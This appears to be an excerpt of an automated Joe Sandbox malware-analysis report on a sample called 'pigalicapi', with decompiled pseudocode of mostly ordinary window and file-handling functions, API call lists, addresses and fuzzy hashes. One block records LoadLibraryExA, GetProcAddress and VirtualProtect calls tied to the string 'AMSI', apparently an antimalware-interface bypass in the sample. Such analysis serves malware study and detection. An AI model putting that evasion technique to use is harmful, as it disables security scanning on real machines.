                                                                                                                                                                                                                                                                                          				void* _t42;
                                                                                                                                                                                                                                                                                          				intOrPtr _t47;
                                                                                                                                                                                                                                                                                          				intOrPtr _t71;
                                                                                                                                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0081F6F0);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t35 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_push(_t35 ^ _t73);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t71 = _a4;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				_t4 = _t71 + 0x5c; // 0xcccc0004
                                                                                                                                                                                                                                                                                          				if(IsWindow( *_t4) != 0) {
                                                                                                                                                                                                                                                                                          					_t5 = _t71 + 0x5c; // 0xcccc0004
                                                                                                                                                                                                                                                                                          					_t6 = _t71 + 0x6c; // 0x6aec8b55
                                                                                                                                                                                                                                                                                          					if( *_t6 == GetWindowLongA( *_t5, 0xfffffffc)) {
                                                                                                                                                                                                                                                                                          						_t7 = _t71 + 0x74; // 0xa1640081
                                                                                                                                                                                                                                                                                          						_t8 = _t71 + 0x5c; // 0xcccc0004
                                                                                                                                                                                                                                                                                          						if(SetWindowLongA( *_t8, 0xfffffffc,  *_t7) != 0) {
                                                                                                                                                                                                                                                                                          							 *(_t71 + 0x74) = DefWindowProcA;
                                                                                                                                                                                                                                                                                          							 *(_t71 + 0x5c) = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t11 = _t71 + 0x44; // 0x1f34
                                                                                                                                                                                                                                                                                          				_t40 =  *_t11;
                                                                                                                                                                                                                                                                                          				if(_t40 != 0 && ( *(_t71 + 0x58) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                          					DestroyMenu(_t40);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t15 = _t71 + 0x48; // 0x10845f6
                                                                                                                                                                                                                                                                                          				_t41 =  *_t15;
                                                                                                                                                                                                                                                                                          				if(_t41 != 0) {
                                                                                                                                                                                                                                                                                          					ImageList_Destroy(_t41);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t16 = _t71 + 0xa4; // 0xfc45c700
                                                                                                                                                                                                                                                                                          				_t42 =  *_t16;
                                                                                                                                                                                                                                                                                          				if(_t42 != 0 && DeleteObject(_t42) != 0) {
                                                                                                                                                                                                                                                                                          					 *(_t71 + 0xa4) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t18 = _t71 + 0x6c; // 0x6aec8b55
                                                                                                                                                                                                                                                                                          				_t43 =  *_t18;
                                                                                                                                                                                                                                                                                          				if( *_t18 != 0) {
                                                                                                                                                                                                                                                                                          					E00815701(_t43);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t19 = _t71 + 0x4c; // 0xe8560974
                                                                                                                                                                                                                                                                                          				_t44 =  *_t19;
                                                                                                                                                                                                                                                                                          				if( *_t19 != 0) {
                                                                                                                                                                                                                                                                                          					E00815DE2(_t44);
                                                                                                                                                                                                                                                                                          					_t74 = _t74 + 4;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t71 + 0x4c)) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t71 + 0x50)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t71 + 0x54)) = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 2;
                                                                                                                                                                                                                                                                                          				_t24 = _t71 + 0x34; // 0xcccccccc
                                                                                                                                                                                                                                                                                          				_t45 =  *_t24;
                                                                                                                                                                                                                                                                                          				if( *_t24 != 0) {
                                                                                                                                                                                                                                                                                          					E00815701(_t45);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t25 = _t71 + 0x14; // 0xf33b1476
                                                                                                                                                                                                                                                                                          				_t46 =  *_t25;
                                                                                                                                                                                                                                                                                          				if( *_t25 != 0) {
                                                                                                                                                                                                                                                                                          					E00815DE2(_t46);
                                                                                                                                                                                                                                                                                          					_t74 = _t74 + 4;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t71 + 0x14)) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t71 + 0x18)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t71 + 0x1c)) = 0;
                                                                                                                                                                                                                                                                                          				_t29 = _t71 + 8; // 0xffffb600
                                                                                                                                                                                                                                                                                          				_t47 =  *_t29;
                                                                                                                                                                                                                                                                                          				if(_t47 != 0) {
                                                                                                                                                                                                                                                                                          					_t47 = E00815DE2(_t47);
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t71 + 8)) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t71 + 0x10)) = 0;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t71 + 0xc)) = 0;
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				return _t47;
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x0080ba03
                                                                                                                                                                                                                                                                                          0x0080ba05
                                                                                                                                                                                                                                                                                          0x0080ba10
                                                                                                                                                                                                                                                                                          0x0080ba14
                                                                                                                                                                                                                                                                                          0x0080ba1b
                                                                                                                                                                                                                                                                                          0x0080ba1f
                                                                                                                                                                                                                                                                                          0x0080ba25
                                                                                                                                                                                                                                                                                          0x0080ba28
                                                                                                                                                                                                                                                                                          0x0080ba2f
                                                                                                                                                                                                                                                                                          0x0080ba3d
                                                                                                                                                                                                                                                                                          0x0080ba3f
                                                                                                                                                                                                                                                                                          0x0080ba42
                                                                                                                                                                                                                                                                                          0x0080ba50
                                                                                                                                                                                                                                                                                          0x0080ba52
                                                                                                                                                                                                                                                                                          0x0080ba55
                                                                                                                                                                                                                                                                                          0x0080ba64
                                                                                                                                                                                                                                                                                          0x0080ba6c
                                                                                                                                                                                                                                                                                          0x0080ba6f
                                                                                                                                                                                                                                                                                          0x0080ba6f
                                                                                                                                                                                                                                                                                          0x0080ba64
                                                                                                                                                                                                                                                                                          0x0080ba50
                                                                                                                                                                                                                                                                                          0x0080ba72
                                                                                                                                                                                                                                                                                          0x0080ba72
                                                                                                                                                                                                                                                                                          0x0080ba7c
                                                                                                                                                                                                                                                                                          0x0080ba84
                                                                                                                                                                                                                                                                                          0x0080ba84
                                                                                                                                                                                                                                                                                          0x0080ba8a
                                                                                                                                                                                                                                                                                          0x0080ba8a
                                                                                                                                                                                                                                                                                          0x0080ba8f
                                                                                                                                                                                                                                                                                          0x0080ba92
                                                                                                                                                                                                                                                                                          0x0080ba92
                                                                                                                                                                                                                                                                                          0x0080ba98
                                                                                                                                                                                                                                                                                          0x0080ba98
                                                                                                                                                                                                                                                                                          0x0080baa0
                                                                                                                                                                                                                                                                                          0x0080baad
                                                                                                                                                                                                                                                                                          0x0080baad
                                                                                                                                                                                                                                                                                          0x0080bab3
                                                                                                                                                                                                                                                                                          0x0080bab3
                                                                                                                                                                                                                                                                                          0x0080bab8
                                                                                                                                                                                                                                                                                          0x0080babb
                                                                                                                                                                                                                                                                                          0x0080babb
                                                                                                                                                                                                                                                                                          0x0080bac0
                                                                                                                                                                                                                                                                                          0x0080bac0
                                                                                                                                                                                                                                                                                          0x0080bac5
                                                                                                                                                                                                                                                                                          0x0080bac8
                                                                                                                                                                                                                                                                                          0x0080bacd
                                                                                                                                                                                                                                                                                          0x0080bad0
                                                                                                                                                                                                                                                                                          0x0080bad0
                                                                                                                                                                                                                                                                                          0x0080bad3
                                                                                                                                                                                                                                                                                          0x0080bad6
                                                                                                                                                                                                                                                                                          0x0080bad9
                                                                                                                                                                                                                                                                                          0x0080badc
                                                                                                                                                                                                                                                                                          0x0080badc
                                                                                                                                                                                                                                                                                          0x0080bae1
                                                                                                                                                                                                                                                                                          0x0080bae4
                                                                                                                                                                                                                                                                                          0x0080bae4
                                                                                                                                                                                                                                                                                          0x0080bae9
                                                                                                                                                                                                                                                                                          0x0080bae9
                                                                                                                                                                                                                                                                                          0x0080baee
                                                                                                                                                                                                                                                                                          0x0080baf1
                                                                                                                                                                                                                                                                                          0x0080baf6
                                                                                                                                                                                                                                                                                          0x0080baf9
                                                                                                                                                                                                                                                                                          0x0080baf9
                                                                                                                                                                                                                                                                                          0x0080bafc
                                                                                                                                                                                                                                                                                          0x0080baff
                                                                                                                                                                                                                                                                                          0x0080bb02
                                                                                                                                                                                                                                                                                          0x0080bb02
                                                                                                                                                                                                                                                                                          0x0080bb07
                                                                                                                                                                                                                                                                                          0x0080bb0a
                                                                                                                                                                                                                                                                                          0x0080bb12
                                                                                                                                                                                                                                                                                          0x0080bb12
                                                                                                                                                                                                                                                                                          0x0080bb15
                                                                                                                                                                                                                                                                                          0x0080bb18
                                                                                                                                                                                                                                                                                          0x0080bb1e
                                                                                                                                                                                                                                                                                          0x0080bb2c

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsWindow.USER32(CCCC0004), ref: 0080BA33
                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 0080BA48
                                                                                                                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 0080BA5C
                                                                                                                                                                                                                                                                                          • DestroyMenu.USER32(00001F34,?,00809A84), ref: 0080BA84
                                                                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(010845F6,?,00809A84), ref: 0080BA92
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(FC45C700), ref: 0080BAA3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$DestroyLong$DeleteImageList_MenuObject
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2453398382-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 26126f5e309eab5ab73eef636bcff60e0647cd3e1b1f387cee6e68d6022ea630
                                                                                                                                                                                                                                                                                          • Instruction ID: efad6145cf50ffeb84867a26bd033eb79c6b9d17b935f7dc10baa6e0946882f7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26126f5e309eab5ab73eef636bcff60e0647cd3e1b1f387cee6e68d6022ea630
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 184129B1A01B109FC731DF6ADC84A1BF7E9FF94710B248A1AE892C3A91D775E9408B10
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                                                                                                                          			E00806860(intOrPtr* __ecx, intOrPtr* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				struct tagENHMETAHEADER _v164;
                                                                                                                                                                                                                                                                                          				intOrPtr _v168;
                                                                                                                                                                                                                                                                                          				intOrPtr _v172;
                                                                                                                                                                                                                                                                                          				struct HENHMETAFILE__* _v176;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v180;
                                                                                                                                                                                                                                                                                          				int _v184;
                                                                                                                                                                                                                                                                                          				int _v188;
                                                                                                                                                                                                                                                                                          				int _v192;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                                                                                          				int _t49;
                                                                                                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t66;
                                                                                                                                                                                                                                                                                          				int _t68;
                                                                                                                                                                                                                                                                                          				int _t75;
                                                                                                                                                                                                                                                                                          				int _t76;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t77;
                                                                                                                                                                                                                                                                                          				int _t83;
                                                                                                                                                                                                                                                                                          				intOrPtr _t85;
                                                                                                                                                                                                                                                                                          				int _t88;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t89;
                                                                                                                                                                                                                                                                                          				signed int _t90;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t89 = __esi;
                                                                                                                                                                                                                                                                                          				_t40 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v12 = _t40 ^ _t90;
                                                                                                                                                                                                                                                                                          				_t42 = _a4;
                                                                                                                                                                                                                                                                                          				_t68 =  *((intOrPtr*)(__esi + 0xc)) -  *((intOrPtr*)(__esi + 4));
                                                                                                                                                                                                                                                                                          				_t88 =  *((intOrPtr*)(__esi + 8)) -  *__esi;
                                                                                                                                                                                                                                                                                          				_v180 = __ecx;
                                                                                                                                                                                                                                                                                          				if(_t88 >= 0 && _t68 >= 0) {
                                                                                                                                                                                                                                                                                          					_v176 =  *((intOrPtr*)(_t42 + 8));
                                                                                                                                                                                                                                                                                          					_v172 = 0;
                                                                                                                                                                                                                                                                                          					_v168 = 0;
                                                                                                                                                                                                                                                                                          					E00816820( &_v164, 0, 0x6c);
                                                                                                                                                                                                                                                                                          					_v164.iType = 1;
                                                                                                                                                                                                                                                                                          					_v164.nSize = 0x6c;
                                                                                                                                                                                                                                                                                          					_t46 = GetEnhMetaFileHeader(_v176, 0x6c,  &_v164);
                                                                                                                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          					_t48 =  ~_t46 &  &_v164;
                                                                                                                                                                                                                                                                                          					_t75 =  *(_t48 + 0x48);
                                                                                                                                                                                                                                                                                          					_t49 =  *(_t48 + 0x4c);
                                                                                                                                                                                                                                                                                          					_v184 = _t75;
                                                                                                                                                                                                                                                                                          					_v192 = _t49;
                                                                                                                                                                                                                                                                                          					_t50 = MulDiv(_t88, _t49, _t75);
                                                                                                                                                                                                                                                                                          					_t83 = _v192;
                                                                                                                                                                                                                                                                                          					_v188 = _t50;
                                                                                                                                                                                                                                                                                          					_t76 = MulDiv(_t68, _v184, _t83);
                                                                                                                                                                                                                                                                                          					if(_t76 > _t88) {
                                                                                                                                                                                                                                                                                          						_t77 = _v180;
                                                                                                                                                                                                                                                                                          						_t88 = _v188;
                                                                                                                                                                                                                                                                                          						 *_t77 =  *__esi;
                                                                                                                                                                                                                                                                                          						_t80 =  *((intOrPtr*)(__esi + 8));
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t77 + 8)) = _t80;
                                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                                          						_t58 = (_t68 - _t88 - _t80 >> 1) +  *((intOrPtr*)(__esi + 4));
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t77 + 4)) = _t58;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t77 + 0xc)) = _t58 + _t88;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                                          						_t85 =  *__esi + (_t88 - _t76 - _t83 >> 1);
                                                                                                                                                                                                                                                                                          						_t66 = _v180;
                                                                                                                                                                                                                                                                                          						 *_t66 = _t85;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t66 + 8)) = _t85 + _t76;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t66 + 4)) =  *((intOrPtr*)(__esi + 4));
                                                                                                                                                                                                                                                                                          						_t80 =  *((intOrPtr*)(__esi + 0xc));
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t66 + 0xc)) =  *((intOrPtr*)(__esi + 0xc));
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_push(_v172);
                                                                                                                                                                                                                                                                                          					E008162C2();
                                                                                                                                                                                                                                                                                          					_push(_v168);
                                                                                                                                                                                                                                                                                          					_t42 = E008162C2();
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E008159E6(_t42, _t68, _v12 ^ _t90, _t80, _t88, _t89);
                                                                                                                                                                                                                                                                                          			}































                                                                                                                                                                                                                                                                                          0x00806860
                                                                                                                                                                                                                                                                                          0x00806869
                                                                                                                                                                                                                                                                                          0x00806870
                                                                                                                                                                                                                                                                                          0x00806873
                                                                                                                                                                                                                                                                                          0x0080687a
                                                                                                                                                                                                                                                                                          0x00806881
                                                                                                                                                                                                                                                                                          0x00806883
                                                                                                                                                                                                                                                                                          0x0080688d
                                                                                                                                                                                                                                                                                          0x008068a8
                                                                                                                                                                                                                                                                                          0x008068ae
                                                                                                                                                                                                                                                                                          0x008068b4
                                                                                                                                                                                                                                                                                          0x008068ba
                                                                                                                                                                                                                                                                                          0x008068d2
                                                                                                                                                                                                                                                                                          0x008068dc
                                                                                                                                                                                                                                                                                          0x008068e6
                                                                                                                                                                                                                                                                                          0x008068ee
                                                                                                                                                                                                                                                                                          0x008068f6
                                                                                                                                                                                                                                                                                          0x008068f8
                                                                                                                                                                                                                                                                                          0x008068fb
                                                                                                                                                                                                                                                                                          0x00806901
                                                                                                                                                                                                                                                                                          0x00806907
                                                                                                                                                                                                                                                                                          0x0080690d
                                                                                                                                                                                                                                                                                          0x00806913
                                                                                                                                                                                                                                                                                          0x00806919
                                                                                                                                                                                                                                                                                          0x0080692e
                                                                                                                                                                                                                                                                                          0x00806932
                                                                                                                                                                                                                                                                                          0x0080695e
                                                                                                                                                                                                                                                                                          0x00806964
                                                                                                                                                                                                                                                                                          0x0080696a
                                                                                                                                                                                                                                                                                          0x0080696c
                                                                                                                                                                                                                                                                                          0x00806973
                                                                                                                                                                                                                                                                                          0x00806976
                                                                                                                                                                                                                                                                                          0x0080697b
                                                                                                                                                                                                                                                                                          0x0080697e
                                                                                                                                                                                                                                                                                          0x00806983
                                                                                                                                                                                                                                                                                          0x00806934
                                                                                                                                                                                                                                                                                          0x00806938
                                                                                                                                                                                                                                                                                          0x0080693f
                                                                                                                                                                                                                                                                                          0x00806941
                                                                                                                                                                                                                                                                                          0x00806947
                                                                                                                                                                                                                                                                                          0x0080694b
                                                                                                                                                                                                                                                                                          0x00806951
                                                                                                                                                                                                                                                                                          0x00806954
                                                                                                                                                                                                                                                                                          0x00806957
                                                                                                                                                                                                                                                                                          0x00806957
                                                                                                                                                                                                                                                                                          0x0080698c
                                                                                                                                                                                                                                                                                          0x0080698d
                                                                                                                                                                                                                                                                                          0x00806998
                                                                                                                                                                                                                                                                                          0x00806999
                                                                                                                                                                                                                                                                                          0x0080699e
                                                                                                                                                                                                                                                                                          0x008069b0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FileHeaderMeta_memset
                                                                                                                                                                                                                                                                                          • String ID: l
                                                                                                                                                                                                                                                                                          • API String ID: 711141002-2517025534
                                                                                                                                                                                                                                                                                          • Opcode ID: 70da631332a1cc4f3ae9812e00ecbbdce122c8448219450355b5c90d6a1fa1d3
                                                                                                                                                                                                                                                                                          • Instruction ID: 354ceec4934848629f03267fc242477202225a0ce43707305a1c41e23ab287c6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70da631332a1cc4f3ae9812e00ecbbdce122c8448219450355b5c90d6a1fa1d3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A410A75A003189FD724CF28CC45B9ABBB6FF88300F1481ADA58DD7351EA71A995CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(02B54070,00000000,00000800), ref: 02B52509
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,02B54078), ref: 02B52525
                                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 02B52560
                                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 02B52581
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.718905728.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2b51000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                          • String ID: AMSI
                                                                                                                                                                                                                                                                                          • API String ID: 3300690313-3828877684
                                                                                                                                                                                                                                                                                          • Opcode ID: 46cec33a32c67518502f09911daf35c69ca63372281ea18474deeb5da5de3329
                                                                                                                                                                                                                                                                                          • Instruction ID: 8d5c93078ceb3a0a21b2f01cc2675f9efb1ac254bb84c5af711eb07368a308b0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46cec33a32c67518502f09911daf35c69ca63372281ea18474deeb5da5de3329
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C11E4B5E41319EFDB04CF94D865BAEBBB4FF48300F248598EA02AB340D770AA50CB55
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E00808380(void* __eax, void* __eflags, CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t26 = __eax;
                                                                                                                                                                                                                                                                                          				_t27 = __eax + 0x250;
                                                                                                                                                                                                                                                                                          				_t21 = E008071E0(_a4, _t27);
                                                                                                                                                                                                                                                                                          				if(_t21 == 0) {
                                                                                                                                                                                                                                                                                          					MessageBoxA( *(_t26 + 4), "Error reading file!\n", 0x82293e, 0);
                                                                                                                                                                                                                                                                                          					return _t21;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					lstrcpyA(_t27 + 0x58, _a4);
                                                                                                                                                                                                                                                                                          					lstrcpyA(_t27 + 0x15c, _a8);
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t27 + 4), 0xb9, 0, 0);
                                                                                                                                                                                                                                                                                          					E00808160(_t26);
                                                                                                                                                                                                                                                                                          					return _t21;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                                          0x00808386
                                                                                                                                                                                                                                                                                          0x0080838b
                                                                                                                                                                                                                                                                                          0x00808397
                                                                                                                                                                                                                                                                                          0x0080839b
                                                                                                                                                                                                                                                                                          0x008083ed
                                                                                                                                                                                                                                                                                          0x008083f9
                                                                                                                                                                                                                                                                                          0x0080839d
                                                                                                                                                                                                                                                                                          0x008083a5
                                                                                                                                                                                                                                                                                          0x008083b6
                                                                                                                                                                                                                                                                                          0x008083c9
                                                                                                                                                                                                                                                                                          0x008083cf
                                                                                                                                                                                                                                                                                          0x008083da
                                                                                                                                                                                                                                                                                          0x008083da

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 008071E0: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,08000080,00000000), ref: 008071FA
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?,?,?,?,?,00808327,?,?), ref: 008083A5
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00822D54,?,?,?,?,00808327,?,?), ref: 008083B6
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 008083C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrlenA.KERNEL32(?,?,?), ref: 00808182
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: LoadStringA.USER32 ref: 008081A2
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrlenA.KERNEL32(?,?,?), ref: 008081AF
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrcpyA.KERNEL32(?,?,?,?), ref: 008081C4
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrcatA.KERNEL32(?,00822A2C), ref: 008081DF
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrcatA.KERNEL32(?, - ), ref: 008081E7
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrcatA.KERNEL32(?,?,?, - ), ref: 008081F1
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: SetWindowTextA.USER32(?), ref: 008081F8
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 008083ED
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
